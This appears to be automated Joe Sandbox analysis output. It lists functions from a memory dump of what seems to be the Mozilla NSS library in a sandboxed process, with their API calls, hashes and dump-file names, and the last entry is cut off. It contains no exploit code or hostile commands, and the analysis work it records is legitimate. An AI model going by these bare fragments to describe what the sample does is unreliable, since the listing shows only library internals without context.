Part of subcall function 6D544C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6D544CD2
Part of subcall function 6D544C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D544D3A

PR_GetCurrentThread.NSS3 ref: 6D53EF9E

Part of subcall function 6D5C9BF0: TlsGetValue.KERNEL32(?,?,?,6D610A75), ref: 6D5C9C07

free.MOZGLUE(00000000), ref: 6D53EFC3
PR_SetError.NSS3(FFFFE001,00000000), ref: 6D53F016
free.MOZGLUE(00000000), ref: 6D53F022

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
String ID:
API String ID: 2459274275-0
Opcode ID: 09f734ddff2f5b0064188bbc6a0e335bff25c2ba6fd48c8de8988638d8865d1a
Instruction ID: b35e8ce6f49fd01671a748ba3931fa6ab68f69f79563fea4f168957cbff155cf
Opcode Fuzzy Hash: 09f734ddff2f5b0064188bbc6a0e335bff25c2ba6fd48c8de8988638d8865d1a
Instruction Fuzzy Hash: 1441A171E0020AABDF05CFA9DC45BEE7BB9AF48308F014029FA15A7250F772D9118BA1

Function 6D514860 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D514894

Part of subcall function 6D55B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D6318D0,?), ref: 6D55B095

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D5148CA
SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D5148DD
SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6D5148FF
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6D514912
PR_SetError.NSS3(FFFFE005,00000000), ref: 6D51494A

Part of subcall function 6D5AC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D5AC2BF

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
String ID:
API String ID: 759476665-0
Opcode ID: 58c97a951347eaee325edeb22173c92e2c42e5693abd92eafa7407897a2c3386
Instruction ID: fc9c0a24896386ad7c4ff8c662616e2fc5d080e218a54cd3c308b1533dfa9e44
Opcode Fuzzy Hash: 58c97a951347eaee325edeb22173c92e2c42e5693abd92eafa7407897a2c3386
Instruction Fuzzy Hash: 5241B17160C346ABFB09DB69DC84B6B73E8AF8821CF04092DEA5597641F770E914CB52

Function 6D52CF40 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000060), ref: 6D52CF80
SECITEM_DupItem_Util.NSS3(?), ref: 6D52D002
PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6D52D016
PR_SetError.NSS3(FFFFE005,00000000), ref: 6D52D025
PR_NewLock.NSS3 ref: 6D52D043
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6D52D074

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
String ID:
API String ID: 3361105336-0
Opcode ID: 6722f45644e5be3e2920bca1140a2acf7a3c4e1c9370dd6a00a8f20cf55d337b
Instruction ID: a0719b857c7bae22dd82c9886394338c745dafdb1bf006f7598168b5ab4a8cf2
Opcode Fuzzy Hash: 6722f45644e5be3e2920bca1140a2acf7a3c4e1c9370dd6a00a8f20cf55d337b
Instruction Fuzzy Hash: 1B41D6B09003128FEB58CF29C88476A7BA4EF88315F01856ADD198F796E774D889CBD1

Function 6D573FD0 Relevance: 9.1, APIs: 6, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6D573FF2

Part of subcall function 6D5614C0: TlsGetValue.KERNEL32 ref: 6D5614E0
Part of subcall function 6D5614C0: EnterCriticalSection.KERNEL32 ref: 6D5614F5
Part of subcall function 6D5614C0: PR_Unlock.NSS3 ref: 6D56150D

PORT_ArenaMark_Util.NSS3(?), ref: 6D574001
PORT_ArenaAlloc_Util.NSS3(?,00000074), ref: 6D57400F

Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D5610F3
Part of subcall function 6D5610C0: EnterCriticalSection.KERNEL32(?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56110C
Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561141
Part of subcall function 6D5610C0: PR_Unlock.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561182
Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56119C

CERT_CertChainFromCert.NSS3(?,00000004,00000000), ref: 6D574054

Part of subcall function 6D50BB90: PORT_NewArena_Util.NSS3(00001000), ref: 6D50BC24
Part of subcall function 6D50BB90: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6D50BC39
Part of subcall function 6D50BB90: PORT_ArenaAlloc_Util.NSS3(00000000), ref: 6D50BC58
Part of subcall function 6D50BB90: SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6D50BCBE

PR_SetError.NSS3(FFFFE005,00000000), ref: 6D574070
NSS_CMSSignedData_Destroy.NSS3(00000000), ref: 6D5740CD

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$CertCriticalEnterMark_SectionUnlock$AllocateArena_ChainCopyData_DestroyErrorFromItem_Signed
String ID:
API String ID: 3882640887-0
Opcode ID: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
Instruction ID: 50af8812988a400e1e956f247b0bc31288260ea06f93a043de61bebb30427190
Opcode Fuzzy Hash: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
Instruction Fuzzy Hash: 963126B2E0434197EB14DF64DC81B7B33A4AFD4708F154225EE089F646FB32ED5482A2

Function 6D512E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6D502D1A), ref: 6D512E7E

Part of subcall function 6D5607B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6D508298,?,?,?,6D4FFCE5,?), ref: 6D5607BF
Part of subcall function 6D5607B0: PL_HashTableLookup.NSS3(?,?), ref: 6D5607E6
Part of subcall function 6D5607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D56081B
Part of subcall function 6D5607B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6D560825

PR_Now.NSS3 ref: 6D512EDF
CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6D512EE9
SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6D502D1A), ref: 6D512F01
CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6D502D1A), ref: 6D512F50
SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6D512F81

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
String ID:
API String ID: 287051776-0
Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction ID: 26835f0c26e6e186726f775c97bf4236d5461e90bddf862d56f58e57158ce067
Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
Instruction Fuzzy Hash: E731FE71408142CBF73CC655CC87BBAB2A9EF82314F144E6AD52A979D0EB319C82CA21

Function 6D500E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6D500A2C), ref: 6D500E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6D500A2C), ref: 6D500E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6D500A2C), ref: 6D500E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6D500A2C), ref: 6D500E90
free.MOZGLUE(00000000), ref: 6D500EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6D500A2C), ref: 6D500ED9

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: 60d4c4f5b3d0807d389518c66359721dbdb3bac73235311e198a8e0975e16849
Instruction ID: 0aa4b8c84029c86f39a28f29bf09f9af20fe10a1fab002538d3c2e6c32cac7b9
Opcode Fuzzy Hash: 60d4c4f5b3d0807d389518c66359721dbdb3bac73235311e198a8e0975e16849
Instruction Fuzzy Hash: 26212C72A0460557EB048D6F9C45B3B76AEEBC17C5F054837DF18B3612EB61C85582A2

Function 6D4EA9B0 Relevance: 9.1, APIs: 6, Instructions: 101synchronizationCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,?,6D5C9270), ref: 6D4EA9BF
PR_IntervalToMilliseconds.NSS3(?,?,6D5C9270), ref: 6D4EA9DE

Part of subcall function 6D4EAB40: __aulldiv.LIBCMT ref: 6D4EAB66

Part of subcall function 6D5CCA40: LeaveCriticalSection.KERNEL32(?), ref: 6D5CCAAB

LeaveCriticalSection.KERNEL32(?), ref: 6D4EAA2C
WaitForSingleObject.KERNEL32(?,-00000001), ref: 6D4EAA39
EnterCriticalSection.KERNEL32(?), ref: 6D4EAA42
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6D4EAAEB

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalSection$LeaveObjectSingleWait$EnterIntervalMillisecondsValue__aulldiv
String ID:
API String ID: 4008047719-0
Opcode ID: a4ee9ef25d0225ff0c18f71094cd0b8ea57170896bd9b9209c154a496157f98f
Instruction ID: af8b5ced30bc0e635d9b6dbb22428da3f327403907e78290a517744c53848db4
Opcode Fuzzy Hash: a4ee9ef25d0225ff0c18f71094cd0b8ea57170896bd9b9209c154a496157f98f
Instruction Fuzzy Hash: 81417B70504702AFD701CF2AC585FA6BBF1FF46395F258A6DE45A8B241DB719C82CB80

Function 6D50AE50 Relevance: 9.1, APIs: 6, Instructions: 85COMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6D50AEB3
SEC_ASN1EncodeUnsignedInteger_Util.NSS3(00000000,?,00000000), ref: 6D50AECA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6D50AEDD
PR_SetError.NSS3(FFFFE022,00000000), ref: 6D50AF02
SEC_ASN1EncodeItem_Util.NSS3(?,?,?,6D629500), ref: 6D50AF23

Part of subcall function 6D55F080: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 6D55F0C8
Part of subcall function 6D55F080: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6D55F122

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6D50AF37

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Arena_$Free$EncodeError$Integer_Item_Unsigned
String ID:
API String ID: 3714604333-0
Opcode ID: 074c4944b15ef171acd3703966f6d94f5fb527f45dd39ba68f675f229a99ad96
Instruction ID: 17c6f7fcc1a2604d0107208def59e63551b8afc7df04fb6f7d95e5d8012f8e4e
Opcode Fuzzy Hash: 074c4944b15ef171acd3703966f6d94f5fb527f45dd39ba68f675f229a99ad96
Instruction Fuzzy Hash: E5214CB69083005BEB148E189C41F6A77E4AFC9728F154719FD549B291E731D9448793

Function 6D58EE50 Relevance: 9.1, APIs: 6, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000), ref: 6D58EE85
realloc.MOZGLUE(93857CC8,?), ref: 6D58EEAE
PORT_Alloc_Util.NSS3(?), ref: 6D58EEC5

Part of subcall function 6D560BE0: malloc.MOZGLUE(6D558D2D,?,00000000,?), ref: 6D560BF8
Part of subcall function 6D560BE0: TlsGetValue.KERNEL32(6D558D2D,?,00000000,?), ref: 6D560C15

htonl.WSOCK32(?), ref: 6D58EEE3
htonl.WSOCK32(00000000,?), ref: 6D58EEED
memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6D58EF01

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 1351805024-0
Opcode ID: 34bedd4c6fe96d0e7058a362d00f20bee07a80d4888d0495fdb42355b65a6aaf
Instruction ID: 7abcb35e91d1dd52fe923edd114061e176e04de99706480d1701854ca5a76d2f
Opcode Fuzzy Hash: 34bedd4c6fe96d0e7058a362d00f20bee07a80d4888d0495fdb42355b65a6aaf
Instruction Fuzzy Hash: 9D21B131A042259FDF149F28DC80B6AB7B4EF49358F058129ED09DB652E731EC10CBE6

Function 6D507F50 Relevance: 9.1, APIs: 6, Instructions: 76memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6D507F68

Part of subcall function 6D560FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6D5087ED,00000800,6D4FEF74,00000000), ref: 6D561000
Part of subcall function 6D560FF0: PR_NewLock.NSS3(?,00000800,6D4FEF74,00000000), ref: 6D561016
Part of subcall function 6D560FF0: PL_InitArenaPool.NSS3(00000000,security,6D5087ED,00000008,?,00000800,6D4FEF74,00000000), ref: 6D56102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000002C), ref: 6D507F7B

Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D5610F3
Part of subcall function 6D5610C0: EnterCriticalSection.KERNEL32(?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56110C
Part of subcall function 6D5610C0: PL_ArenaAllocate.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561141
Part of subcall function 6D5610C0: PR_Unlock.NSS3(?,?,?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D561182
Part of subcall function 6D5610C0: TlsGetValue.KERNEL32(?,6D508802,00000000,00000008,?,6D4FEF74,00000000), ref: 6D56119C

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6D507FA7

Part of subcall function 6D55FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6D558D2D,?,00000000,?), ref: 6D55FB85
Part of subcall function 6D55FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6D55FBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6D62919C,?), ref: 6D507FBB

Part of subcall function 6D55B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D6318D0,?), ref: 6D55B095

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6D507FCA
SEC_QuickDERDecodeItem_Util.NSS3(00000000,-00000004,6D62915C,00000014), ref: 6D507FFE

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Arena$Item_$Alloc_Arena_DecodeQuickValue$AllocateCopyCriticalEnterErrorFreeInitLockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1489184013-0
Opcode ID: 2fddcef9da8653369b9602441028fc5e6b1468bd74973ba07c64c3d61446aa03
Instruction ID: ae5038ea2ce495b8051ddb8b8f1b5a010b943445ad7a8a3df3ba0236b82afc71
Opcode Fuzzy Hash: 2fddcef9da8653369b9602441028fc5e6b1468bd74973ba07c64c3d61446aa03
Instruction Fuzzy Hash: 3F1136B1D0424557FB18AA359C45F7B72E8DF8865CF010A2EFD59D2A81F720AD4486F2

Function 6D554820 Relevance: 9.1, APIs: 6, Instructions: 74stringCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6D554EB8,?), ref: 6D554884

Part of subcall function 6D558800: TlsGetValue.KERNEL32(?,6D56085A,00000000,?,6D508369,?), ref: 6D558821
Part of subcall function 6D558800: TlsGetValue.KERNEL32(?,?,6D56085A,00000000,?,6D508369,?), ref: 6D55883D
Part of subcall function 6D558800: EnterCriticalSection.KERNEL32(?,?,?,6D56085A,00000000,?,6D508369,?), ref: 6D558856
Part of subcall function 6D558800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6D558887
Part of subcall function 6D558800: PR_Unlock.NSS3(?,?,?,?,6D56085A,00000000,?,6D508369,?), ref: 6D558899

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6D554EB8,?,?,?,?,?,?,?,?,?,?,6D5178F8), ref: 6D55484C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6D554EB8,?,?,?,?,?,?,?,?,?,?,6D5178F8), ref: 6D55486D
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6D5178F8), ref: 6D554899
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D5548A9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D5548B8

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockstrcmp$CondErrorWait
String ID:
API String ID: 2226052791-0
Opcode ID: 4679167b3bd4641bb57dec28ef6f4e0b9f828681bb7ec7449317c86582af5e0e
Instruction ID: e73ebd7fbd634c08b8d856a8ad6fb0167dbb93e3c51ae4989f13083bac25e693
Opcode Fuzzy Hash: 4679167b3bd4641bb57dec28ef6f4e0b9f828681bb7ec7449317c86582af5e0e
Instruction Fuzzy Hash: 28212C76E0428197EF169F65DC806267774FF4E35570549B5DF0947601E721E830C7A2

Function 6D593C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6D595B40: PR_GetIdentitiesLayer.NSS3 ref: 6D595B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6D593D3F

Part of subcall function 6D50BA90: PORT_NewArena_Util.NSS3(00000800,6D593CAF,?), ref: 6D50BABF
Part of subcall function 6D50BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6D593CAF,?), ref: 6D50BAD5
Part of subcall function 6D50BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6D593CAF,?), ref: 6D50BB08
Part of subcall function 6D50BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6D593CAF,?), ref: 6D50BB1A
Part of subcall function 6D50BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6D593CAF,?), ref: 6D50BB3B

PR_EnterMonitor.NSS3(?), ref: 6D593CCB

Part of subcall function 6D5C9090: TlsGetValue.KERNEL32 ref: 6D5C90AB
Part of subcall function 6D5C9090: TlsGetValue.KERNEL32 ref: 6D5C90C9
Part of subcall function 6D5C9090: EnterCriticalSection.KERNEL32 ref: 6D5C90E5
Part of subcall function 6D5C9090: TlsGetValue.KERNEL32 ref: 6D5C9116
Part of subcall function 6D5C9090: LeaveCriticalSection.KERNEL32 ref: 6D5C913F

PR_EnterMonitor.NSS3(?), ref: 6D593CE2
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D593CF8
PR_ExitMonitor.NSS3(?), ref: 6D593D15
PR_ExitMonitor.NSS3(?), ref: 6D593D2E

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
